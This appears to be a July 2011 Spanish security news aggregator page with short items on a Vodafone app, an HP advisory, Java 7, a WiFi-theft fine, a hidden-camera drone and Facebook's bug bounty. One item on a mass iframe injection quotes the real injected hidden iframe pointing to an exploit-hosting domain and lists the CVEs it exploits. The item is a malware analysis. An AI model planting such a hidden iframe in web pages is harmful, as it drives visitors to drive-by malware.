Titulares

Noticias

xx Una aplicación para cambiar de tarifa

El programa de Vodafone permite controlar el gasto desde el teléfono

La imagen se repite con más frecuencia de la deseada. Llega la factura a fin de mes y toca revisar de dónde asalen esos cargos que terminan por sumar una cifra más alta de la esperada. El siguiente paso suele ser un cambio de tarifa. Entonces llegan los problemas: hablar con una operadora, esperar, ver por qué la cuenta es más alta de lo esperado.

Vodafone acaba de publicar una aplicación "mi Vodafone", de momento solo disponible en Android Market, y aseguran que pronto estará para iPhone, que sirve para consultar el gasto en cada momento, ver promociones, cambiar de tarifa, consultar puntos para renovar el teléfono o borrar los mensajes del contestador.

FUENTE :http://www.elpais.com/articulo/tecnologia/aplicacion/cambiar/tarifa/elpeputec/20110729elpeputec_4/Tes


Leer más
Noticia publicada 31 Julio 2011, 02:36 am por wolfbcn
xx Denegación de servicio en HP Data Protector

HP ha publicado una actualización para evitar una vulnerabilidad de denegación de servicio, explotable de forma remota, en HP Data Protector.

El fallo afecta a las versiones 6.0, 6.10 y 611 de HP Data Protector, bajo plataformas Windows 32bit (2000, 2003, XP, 2008 y Vista), HP-UX, Linux y Solaris. La vulnerabilidad, con CVE-2011-2399, reside en el demonio Media Management Daemon (mmd) y podría permitir a un atacante remoto provocar condiciones de denegación de servicio.

HP ha publicado actualizaciones para corregir esta vulnerabilidad. Dada la diversidad de sistemas y versiones afectados se recomienda consultar el parche correspondiente en el boletín de HP: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02940981

Antonio Ropero
 antonior@hispasec.com
Twitter: http://www.twitter.com/aropero

FUENTE :http://www.hispasec.com/unaaldia/4661

Leer más
Noticia publicada 31 Julio 2011, 02:30 am por wolfbcn
xx Java 7, lanzamiento oficial



La versión final de Java 7 ha sido publicada de forma oficial por Oracle, tras más de 4 años desde la última actualización. Comenta Mark Reinhold (Arquitecto Jefe de Oracle) en su blog, que se han corregido 9.494 bugs, se han implementado 1.966 mejoras y 9.018 cambios. Toda una revisión en profundidad.

Pero Java 7 es algo más que una colección de errores corregidos. La nueva versión ha realizado cambios en el lenguaje para facilitar el trabajo de los programadores, ahora dispone de una nueva API del sistema de archivos y un marco de trabajo nuevo enfocado al trabajo con procesadores de varios núcleos.

Java 7 permite utilizar otros lenguajes, (tales como Ruby), gestión automática de recursos, mejoras en la liberación de la memoria de recursos, compatibilidad con el estándar Unicode 6.0, un nuevo interfaz visual y otro conjunto de funcionalidades que agradecerán los programadores.

Java despierta tantas pasiones a favor como en contra, pero aquí está desde principios de los 90, aunque le han dado por muerto en muchas ocasiones. Publicaciones especializadas en programación, como Genbeta Dev desgranarán hasta el último detalle esta importante actualización que va a permitir la creación de aplicaciones mejores más en consonancia con las necesidades actuales. Cuatro años en este sector, es mucho tiempo. Java 7 está disponible para Windows, Linux y Solaris, la versión para Mac OS X aún no está lista.

Vía | Blog de Mark Reinhold
Más información |...

Leer más
Noticia publicada 31 Julio 2011, 02:27 am por wolfbcn
xx Le roban su conexión WiFi durante 10 minutos y podrían multarle con 6.000 euros

Curioso caso el que hemos conocido esta semana en Finlandia. Se trata de una multa a la que se enfrenta una mujer residente en el país escandinavo y a cuya conexión WiFi habrían accedido intrusos para intercambiar archivos protegidos con derechos de autor, hecho por el que se enfrenta a una sanción de 6.000 euros.

Bitelia se hace eco del caso de una mujer finlandesa que ha recibido una inesperada notificación en la que se le afirmaba que está en pleno proceso de demanda por haber intercambiado archivos con copyright -algo perseguido en el país nórdico-durante el ridículo tiempo de 10 minutos. Sin embargo, la demandada asegura que nunca ha utilizado programas P2P y que su conexión habría sido robada durante ese periodo de tiempo por algún usuario que habría accedido a ella.

Sus reclamaciones habrían sido ignoradas por el centro antipiratería que le demandó (TTVK), pero sus abogados insisten en que su cliente ha sido víctima de un robo de su WiFi. Además, señalan que la multa de 6.000 euros es totalmente desproporciada ya que supone que cada minuto de acceso a la red P2P habría costado 600 euros. "Los 10 minutos más caros de la historia de Internet", afirmó Joonas Mäkinen, del Partido Pirata Finladés.

"Los problemas son numerosos, por no mencionar la idea de que una tercera parte está obteniendo datos privados de un cliente de un proveedor de Internet, dueño de su red y que bajo ningún caso debería ser responsable de las acciones de sus usuarios. Esto amenaza la presunción de inocencia y la neutralidad de los proveedores de servicios...

Leer más
Noticia publicada 31 Julio 2011, 02:24 am por wolfbcn
xx Nuevo virus de videos en FACEBOOK!!! ojo los morbosos!!! jeje

Cuando sera que aprenden, estamos muy grandesitos , viejos y curtidos de ver estas tacticas y siguen cayendo :S

Asi se ve en el muro de tus amigos:


TEMA REPETIDO

LEER :

https://foro.elhacker.net/noticias/un_investigador_espanol_detecta_una_seria_vulnerabilidad_en_facebook-t334695.0.html;msg1644012;topicseen#msg1644012

https://foro.elhacker.net/noticias/facebook_quiere_cerrar_paginas_que_suplantan_su_nombre-t334992.0.html


Leer más
Noticia publicada 30 Julio 2011, 23:40 pm por Graphixx
xx La policía británica amplía investigaciones contra 'News of the World'

El diario podría no sólo haber pinchando teléfonos, sino que también hackeado ordenadores con ayuda de mails troyanos

Londres. (dpa) - La policía británica anunció la ampliación de las investigaciones contra el diario inglés News of the Word para rastrear pruebas de que el diario no sólo espió pinchando teléfonos, sino que también hackeó ordenadores con ayuda de mails troyanos, informó un portavoz de Scotland Yard. Una unidad especial investigará el ordenador de un ex agente secreto, según se dijo. El escándalo mediático por las escuchas telefónicas, por el soborno a policías y otros métodos ilegales de investigación utilizadas supuestamente por el diario "News of the Word", de Rupert Murdoch, sacudieron Reino Unido en las últimas semanas.

Unos 4.000 teléfonos de personojes públicos y privados fueron pinchados por el diario, entre ellos viudas de soldados y familiares de víctimas de asesinatos. Mientras, el hijo de Rupert Murdoch, James Murdoch, podría tener que someterse a un nuevo interrogatorio en el Parlamento británico. En las últimas semanas testificó con su padre ante la comisión el Parlamento competente para estudiar el caso.

Después de que ex responsables de la editorial mostraran dudas sobre las declaraciones de Murdoch, está prevista una revisión de esa declaración, informó la presidencia de la comisión. Sin embargo, los diputados rechazaron un nuevo interrogatorio de Murdoch en breve, aunque más tarde sería posible. El punto de controversia es saber si Murdoch conocía o no los m...

Leer más
Noticia publicada 30 Julio 2011, 18:12 pm por wolfbcn
xx WASP: un dron crackeador de redes WIFI y GSM

Uno no deja de asombrarse ante la imaginación de los hackers que acuden año tras año a la DEFCON para mostrar sus invenciones y novedosas técnicas relacionadas con el mundo de la seguridad informática. La ‘estrella’ de esta edición, que se celebra en Las Vegas, ha sido un dron, un vehículo aéreo desarmado (UAV, por sus siglas en inglés), destinado a detectar y crackear redes wifi y GSM. Ver para creer…

El ingenio ha sido bautizado con el nombre de WASP, acrónimo de Wireless Aerial Surveillance Platform. Ya que “wasp” significa avispa, en inglés, no podía tener este dron otros colores que los que veis en la imagen inferior.

(Clic para ampliar)



WASP es un dron fabricado para el ejército de los Estados Unidos que ha sido modificado para realizar otras tareas, algo “diferentes” de las originales… Así, ahora puede ser utilizado para rastrear y crackear redes Wifi y GSM en todo tipo de entornos urbanos.

Sus 1,82 metros alojan un equipo con todas las herramientas necesarias para crackear redes, sobre la ya famosa distribución Back Track Linux, una placa base VIA EPIA Pico-ITX y 32 GB de almacenaje, utilizando la plataforma Arduino para su construcción.

Bueno, el concepto de “wardriving” ha sido ampliado, no?

Vía...

Leer más
Noticia publicada 30 Julio 2011, 13:45 pm por wolfbcn
xx El 70% de los internautas usa la red para buscar amor y sexo

Quizá por el calor, o quizá por el mayor tiempo libre, pero en verano nada menos que 7 de cada 10 internautas asegura usar la red en ese sentido.

El calor hace que muchos usuarios decidan quedarse en casa al amparo de su aire acondicionado. Muchos de estos usuarios utilizan internet para conocer gente nueva o contactar con amigos. En este sentido, 7 de cada 10 internautas afirman que internet es el lugar adecuado para conocer a gente y ligar en esta época del año.

 El verano es la época en la cual habitualmente se goza de más tiempo libre. Son muchas las posibilidades para pasar el tiempo de ocio como trabajar, viajar, descansar o estudiar. Con motivo del auge imparable de internet, el portal de comercio electrónico conZumo.com, ha querido conocer la opinión de los internautas sobre la utilidad que tiene esta herramienta para buscar amor y sexo en esta época del año.

 Según los resultados de la encuesta, los internautas españoles piensan que internet es un sitio idóneo para conocer a gente nueva y ligar. Sin embargo, son cautelosos en esta práctica ya que un 44 por ciento de los mismos afirman que no ejercen este hábito en internet.

 Por el contrario, hay que destacar en estas respuestas que el 20 por ciento de los encuestados afirman realizar a menudo esta práctica y el 17 por ciento la realizan con mucha frecuencia. Por lo tanto, un buen porcentaje de internautas españoles se lanzan a este hábito en verano a través de la red.

 Por otro lado, en esta época, al tener más tiempo libre, se navega más por internet. Dentro de las actividades realizadas en la Red, la que más destaca es la...

Leer más
Noticia publicada 30 Julio 2011, 13:38 pm por wolfbcn
xx Inyección masiva de iframes a sitios de e-commerce

Un grupo de investigadores publicó en su blog, una nueva alerta de un ataque masivo a páginas con inyección de iframe activo, que estuvo particularmente focalizado en sitios de e-commerce. El ataque fue reportado con más de 90 mil páginas afectadas. El iframe permite la ejecución de contenido externo en la página que se está visitando. De esta forma, los visitantes de todos los sitios afectados podían infectarse con malware por el solo hecho de visitar un sitio web de confianza.

A través de diversas vulnerabilidades, todas las páginas afectadas se encuentran con la siguiente inyección de iframe:


Código
  1. <title>Wholesaler<iframe src=&#39;http://willysy.com/images/banners/&#39; style=&#39;position:absolute;visibility:hidden&#39;></iframe></title>

Una vez que el usuario visita alguna de las web infectadas, se ejecuta en la maquina del usuario, a través de un ataque multi-stage, código javascript que explota las siguientes vulnerabilidades que afectan al explorador web:

  • CVE-2010-0840 – Java Trust
  • CVE-2010-0188 – PDF LibTiff
  • CVE-2010-0886 – Java SMB
  • CVE-2006-0003 – IE MDAC
  • CVE-2010-1885 – HCP

Los dominios donde se alojan los exploit se encuentran en Rusia y son bloqueadas por nuestro software de seguridad. Analizando los sitios donde se encontraba presente este iframe, pudimos encontrar que estos son sensibles a inyecciones de SQL.

Es por eso que ante estos casos, si un desarrollador se encuentra ante este problema, debería revisar el cód...

Leer más
Noticia publicada 30 Julio 2011, 03:39 am por @Sthéfano
xx Facebook pagará por las vulnerabilidades descubiertas en su sitio


Pareciera que no hubiese semana en la que no apareciese un agujero de seguridad en Facebook, ¿verdad? Pues resulta que es así. Según Alex Rice, que está a la cabeza de la seguridad en la red social, en promedio se encuentran de uno a tres errores por semana gracias a las entre treinta y cincuenta notificaciones de vulnerabilidades que les llegan semanalmente.

Tomando esto como base, y siguiendo los pasos de otras compañías como Google o Mozilla, Facebook se sube al carro de pagar por cada vulnerabilidad encontrada en el código de su sitio. Es decir, lo conocido como bug bounty. Para ello, han puesto en marcha un sitio llamado White hats a través del cual reportar los agujeros que se encuentren.

La recompensa por cada bug será de quinientos dólares, aunque puede aumentar en función de bugs específicos. En el sitio, se encuentran los detalles que especifican cuales son las condiciones que se necesitan para recibir la recompensa y cuales vulnerabilidades son aceptadas y cuales no.

Por lo general, las compañías que han puesto en marcha un bug bounty han obtenido buenos resultados de esta iniciativa y dudo de que ocurra lo contrario en el caso de Facebook.

Vía | Computer World
Enlace | White hats

FUENTE...

Leer más
Noticia publicada 30 Julio 2011, 02:03 am por wolfbcn

 

 

Conectado desde: 18.190.239.193